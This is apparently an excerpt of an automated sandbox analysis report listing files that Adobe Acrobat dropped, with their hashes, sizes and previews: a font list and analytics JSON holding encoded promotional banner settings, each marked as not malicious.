                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):295
                              Entropy (8bit):5.37995137784988
                              Encrypted:false
                              SSDEEP:
                              MD5:3044BBF39C406BA31E95EC52DC40DF05
                              SHA1:BC77C2C5CBB637DC7BBE43F6E10BCA0F5FADE0FB
                              SHA-256:2C0BAFC554171BFD52E507468F1BD7961AB18A9DAE412A0C78A013FFDF5142D9
                              SHA-512:1874C369CAF28CD420D8451EA04290925CDB73FC445E036A99981697739444DFBCC7192B049D2A1DE09A4AC0FC29C5155E9D83F167D8FCDBB474367D6ED740CE
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):294
                              Entropy (8bit):5.32797118424821
                              Encrypted:false
                              SSDEEP:
                              MD5:CDA0DD4493F323025DB3A9EDFD37ED7E
                              SHA1:1401B02DF98604A2D2ECF53728C2B91C099E6969
                              SHA-256:2097A66406E44277704062E0036085B0032C912BB6EE03C6405595DCA1156BA0
                              SHA-512:CB6355B25C1C626A9D67E2BE6D99EA05E2CB56A814BDDECBC23F74833EBBC6C671E9AFBF76167BE0526228C9D929E1D8EBD4DD49A69876DDAF3E3885B300957F
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):294
                              Entropy (8bit):5.3077305119052065
                              Encrypted:false
                              SSDEEP:
                              MD5:3877255578E041F2C1D1D020ED94EAA0
                              SHA1:8B0B30F6A78547AFDF4F6018746ADF82D3C8F4EB
                              SHA-256:E70810639FA6BE9C547F77B0C053AC91EDD93122C54839D529C3D8529E4F5487
                              SHA-512:5F648BABEB456B362DEF42C45BC67984691BD3B11B065FCC4E604CB661B70D006C46EDE0958609107CD6765554130B5426A7BD200F148596A85D46B1497E3C84
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):285
                              Entropy (8bit):5.368913601381497
                              Encrypted:false
                              SSDEEP:
                              MD5:1032EF8D52F064F9BA54F44A3521617D
                              SHA1:9B637624CCAB5368910A31626CF2004EA4A45E6C
                              SHA-256:694D71105DFD4392F471E0ABFBC594562DC183CCA2CBC46904697ED195EE635B
                              SHA-512:F7A206FF70AB86D1B2CD884956DD7C00C0F680D29D3375095FFA42DC4A3257186910F86BE4F9036D7181F4713454C2F061D27C43D6D08F3053744487803B56BE
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1063
                              Entropy (8bit):5.667024565444472
                              Encrypted:false
                              SSDEEP:
                              MD5:6FB21B4A1966934E906E5FD341F3B264
                              SHA1:C5F2C2C027D6E214F53D90898A1330CD464FF283
                              SHA-256:00E9D076903431F90FF272F2CE619BE4090EBC0DBBD4538F70662AB5BB0ABC40
                              SHA-512:9742FA2D7AB0B296C8DE9FBDF0AD1B0FD4376AEA5E0438C7924D6D73AC08B30D5575D4BB7946A68D3C7F0CB7C9804C0F79252D4E7B15DBF1D15100581D42F144
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_2","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"afb9c2a3-eaf4-41f9-9d73-768e72f72282","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQgZmlsZXMgdG8gYW5kIGZyb20gUERGXG53aXRob3V0IGxpbWl0cy4ifSwidGNhdElkIjpudWxsfQ==","dataType":"application\/json","encodingSc

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1050
                              Entropy (8bit):5.654825819353827
                              Encrypted:false
                              SSDEEP:
                              MD5:D1D7B315E0C3B70551CD59A8289639FF
                              SHA1:A2180EAD75569DCED17DAEEA6607DF355CA4BD53
                              SHA-256:B128378CB22B1C3BDFF3959D5A23FFB80DB9ADCB8E1AC27AF02D447FF57AD24C
                              SHA-512:561CBA633A0A5BEE460F28E626C36167959B227955CFDF1AA2DCB3D854049C44DE62845B2ADBFB38880D9D071E69699F5A09B1EF8146843C2F2056BED264DA1A
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):292
                              Entropy (8bit):5.31893735790141
                              Encrypted:false
                              SSDEEP:
                              MD5:2421A37EB822ECCE458018255FBB8275
                              SHA1:135764019701E6E0F658A88A7B9A1A2115CB5AFD
                              SHA-256:200901D52325067FB49AC892EEAE693A25D33F54D6DC684C7778D3A82ED38AFC
                              SHA-512:5E2F4E5C1E1FCC1EC2370B030471B8AACD4276AB9C2E97C8892098F8D852D89CB015622490BD6790387870F7E1702E717B964FD99736A031DE7CB069A7ED8B1F
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1038
                              Entropy (8bit):5.649831735610941
                              Encrypted:false
                              SSDEEP:
                              MD5:EC248559EA777769CE7AF37B897D2B5E
                              SHA1:8BC0F51C85C7D3AF92BAE442F36308F1F496D68F
                              SHA-256:93B1763F2DB7FB845AB5263A1E6ED30710B32D0CCFFFF714A631D36BF6721415
                              SHA-512:1415E45252F8438795D848CC14AD67D57D36D858EB279FF5069D04D1BA8B03555613A497D4906C74D56C8AC399B7554780E155324A55B35422F3E6864EB2F35B
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_1","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"49d2f713-7aa9-44db-aa50-0a7a22add459","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVkaXQgdGV4dCwgaW1hZ2VzLCBwYWdlcywgYW5kIG1vcmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1744

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1164
                              Entropy (8bit):5.699979217591801
                              Encrypted:false
                              SSDEEP:
                              MD5:610B6A4D5B74FFE9E22FD4A8B759F0C1
                              SHA1:ED69E21E0BA6545904732E7B1D0CB134C0CFB8FC
                              SHA-256:36DB56245BA3E4CB893F268A384BF9859BCCBFFBE61A32A3804C9B869F2EED9B
                              SHA-512:B27FE2D3DD4D168D07C331DBEF2A513A96C172E11E72CA9A6B6F55617158BA7FB31730590DAE720C5E4360E934FDC5ECD2AB51B50969B42ACC7EA39DC866C6B7
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):289
                              Entropy (8bit):5.3213951639704105
                              Encrypted:false
                              SSDEEP:
                              MD5:A87A70AEB5D01B3BC2825704CFB44C44
                              SHA1:F8204C1EADF3F67A2EB7433BC889837B9D2013B9
                              SHA-256:599BFDCE19DE875BE9CEC8299FCAA40DCB51539121EB4D1A619B10BB4DA6482F
                              SHA-512:60AF650DA82F1262B4ECA3D4D84A25D8E548FA62181BE85943539A69F19C46CEF73E26D300FEA7FF61200885FD409C43ADC5A93E5DA8614E34E5B50532E239CA
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1395
                              Entropy (8bit):5.775409400966155
                              Encrypted:false
                              SSDEEP:
                              MD5:5195C4FBE13FE2DD23B596CF137F27FD
                              SHA1:B9273132034447E064EEA3B25C7F6F64CD606659
                              SHA-256:E63EA1849C8D70919DA29A3CBC647036C47E9F54F81F95C5A20DE63CD4CF12A9
                              SHA-512:211712142D5FC54A3AC41CE84C6D74358028855D58087A4DBF92D786324878C308D39FA47941775BAE2F07D0AF4F09446F63076D906B4B47FE09ABA4EADE8F51
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):291
                              Entropy (8bit):5.304795215843789
                              Encrypted:false
                              SSDEEP:
                              MD5:BD2E95687EE93AAE96F8A48ECF710EE9
                              SHA1:AEA9B3CC6E19C9EA68B610B092B9E2D6FFB81628
                              SHA-256:1E3AEE6A1F626BF16B3F6088D4EAC5C325462FA776B6FF65D025FD91F7FA8DB1
                              SHA-512:7444612B01B782892A01DEA52069BF7D40D05AFAB8D7029304FC5AC15DFF2D9854FC0A8AA46B7B41D83ED95BDE7C06EC67CCB19E653C56CB710E33E29DE5946F
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):287
                              Entropy (8bit):5.3087685427640885
                              Encrypted:false
                              SSDEEP:
                              MD5:696109835BFE66BA3508386C5A482731
                              SHA1:91208CD3C733FDDBF047A3481C1B89442B945104
                              SHA-256:13A3C00F0D096D3EF0214C195A611B39A362BCABD3D5DF309859D3D754906373
                              SHA-512:1B9DD38BED031156F89364979BB52AB6FDCC0EE1CA3C48C5AFCE96258B3FCEAADDEB8DCBBA822626D6E6CC9438C5683647AF10103393EA497B335DEF7D31AFCC
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1058
                              Entropy (8bit):5.657982839648209
                              Encrypted:false
                              SSDEEP:
                              MD5:5EAC2B072B2374C4DC9E886A09E17894
                              SHA1:D89ED0E14E0DD8F2F195608D8A0B763DB91B462D
                              SHA-256:4E6E03337DD1EE2F472F6189F5F328A43B730FA4423FBECCFB25CCF514814274
                              SHA-512:2450C5E4872E5B92A0FE32979017A72E9E9A4A636DF8A462F17704530016422356D7225D484A2ACF2234E2D03CDF4CEC284A6A65DDDCA5714422429E648426E1
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_3","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"ece07729-7db6-4f20-9f8d-7976ad373049","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IlNlbmQgZG9jdW1lbnRzICYgZm9ybXNcbmZvciBmYXN0IGUtc2lnbmluZyBvbmxpbmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme"

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):286
                              Entropy (8bit):5.285481013322299
                              Encrypted:false
                              SSDEEP:
                              MD5:02237C862EE76D4E5F40DD0718F7DDA8
                              SHA1:1FC0F7CAA8A1C2D26B0EA7D51FEF51E6B8670806
                              SHA-256:F034D4B4F984B4C3B9ECBF83770364AF49BF74D28874FBFD138D984CDB961F09
                              SHA-512:CFB812EB4DC28FE8F36A036845A24361946F9E78B3530CB0F8F1A62E5A7DA36A645592A0C7024C3F6E31E965EEE6665241050E77278419A6A4EA7B1F6D555558
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):782
                              Entropy (8bit):5.376472487078672
                              Encrypted:false
                              SSDEEP:
                              MD5:BF9F9ACC6F6B6999D80C8EE2FC8695CC
                              SHA1:9F0CF2F43337F93274A60A133DFFF0FDC23D1331
                              SHA-256:FF066E19DB654E711B178317A0360DE2EED56051CC4098DD4E00C7D77A785F80
                              SHA-512:E3BA38412EEC8EA75F9743FF304B6E91932396CA960FF6DEC81D24243D015987DF60C5FE949F8FDF433A98646B118AFACD48E2C81E2138A3089171210EAB0CFB
                              Malicious:false
                              Reputation:unknown
                              Preview:{"analyticsData":{"responseGUID":"8b61b245-479f-49ba-a3e5-38d2e9248eab","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1722522908593,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1722347348621}}}}

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4
                              Entropy (8bit):0.8112781244591328
                              Encrypted:false
                              SSDEEP:
                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                              Malicious:false
                              Reputation:unknown
                              Preview:....

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):2818
                              Entropy (8bit):5.143938543929634
                              Encrypted:false
                              SSDEEP:
                              MD5:625CC8337C7655D66FF5D013FB36C7CD
                              SHA1:1ABF718FDF9BF7378B297434148CF20F8BB37452
                              SHA-256:4AAFF7A5F598A8E1507B85A36ABABE46649EBE4A3C5805FA704E40A4DA1593E1
                              SHA-512:D6D46D88ABB38432BF121D352CD588FFD19560EF3A5AAB48E8BB05CD53A9965C345B488B01B3F2AB67B0EE7153CEB46B249F552C2E1EB4FEB1A98C06CB325CFB
                              Malicious:false
                              Reputation:unknown
                              Preview:{"all":[{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"4889a4a9fc4bc77812aa757023ffc734","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1722347348000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"86389e13d524ece337a3994b66c74b06","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1058,"ts":1722347348000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"b47dac19245827add8763bb67cfaf933","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1063,"ts":1722347348000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"f53ffc0967d189568ddfee9ee37ca553","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1038,"ts":1722347348000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"a0dcfa78085f0629e04901cc86d5f2e5","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1722347348000},{"id":"Edit_InApp_Aug2020","info":{"dg":"b32d9b9634239ae7c37023a27cdc3f50","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
